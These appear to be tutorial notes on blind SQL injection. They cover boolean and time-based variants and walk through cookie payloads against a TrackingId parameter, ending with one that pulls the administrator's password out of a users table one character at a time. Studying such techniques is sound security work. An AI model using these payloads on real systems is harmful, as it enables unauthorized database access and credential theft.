Blind SQL injection

Occur when no SQL message returned

Condition

Categorized into :

Boolean Based Attack

TRUE OR FALSE (GET DIFFERENT RESULT/PAGE CONTENT)

TIME BASED ATTACK

SLEEP

Cons

UNION will not work : cannot see the results of the injected query

Boolean Based Attack Example :

Intercepted Request

Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4

Backend Processing

SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'

• TrackingId is used to check if user is authenticated

Note : If the sql statement is true , we get 'Welcome Back' which doesn't return any sql result because its processed in backend

Payload Testing

TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='1 # Will return True
TrackingId=u5YD3PapBcR4lN3e7Tj4' AND '1'='2 # Will return False

Checking SQL user table existence

TrackingId=u5YD3PapBcR4lN3e7Tj4' AND (SELECT 'a' FROM users LIMIT 1)='a

Exploitation Delivery

TrackingId=u5YD3PapBcR4lN3e7Tj4'  AND (SELECT SUBSTRING(password,§1§,1) FROM users WHERE username='administrator')='§a§

2 comparing second character of the password , 1 only one character if "Welcome Back" is returned it means the position of the password matches